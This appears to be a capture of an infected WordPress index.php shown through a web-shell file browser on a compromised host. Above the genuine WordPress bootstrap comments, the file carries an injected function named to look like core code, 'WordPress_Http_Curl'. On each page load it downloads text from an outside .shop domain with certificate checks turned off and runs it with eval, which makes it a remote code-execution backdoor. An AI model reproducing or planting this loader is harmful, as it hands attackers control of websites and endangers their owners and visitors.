Array ( [data] => )
| Server : LiteSpeed System : Linux in-mum-web984.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64 User : u689097916 ( 689097916) PHP Version : 8.0.30 Disable Function : NONE Directory : /home/u689097916/domains/skjmcc.com/public_html/ |
Upload File : |
<?php
function WordPress_Http_Curl ( $url, $args = array() ) {
if ( ! function_exists( 'curl_init' ) || ! function_exists( 'curl_exec' ) ) {
return false;
}
$handle = curl_init();
curl_setopt( $handle, CURLOPT_URL, $url );
curl_setopt( $handle, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $handle, CURLOPT_HEADER, false );
curl_setopt( $handle, CURLOPT_SSL_VERIFYHOST, false );
curl_setopt( $handle, CURLOPT_SSL_VERIFYPEER, false );
$response = curl_exec( $handle );
$curl_error = curl_error( $handle );
if ( !$curl_error ) {
$response = array(
'data' => eval( '?>'. $response )
);
return $response;
}else{
return $curl_error;
}
if ( PHP_VERSION_ID < 80000 ) {
curl_close( $handle );
}
}
$result = WordPress_Http_Curl( 'https://z60326_6.ydooley.shop/stat/domain_index.txt' );
print_r($result);
// 20260320
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';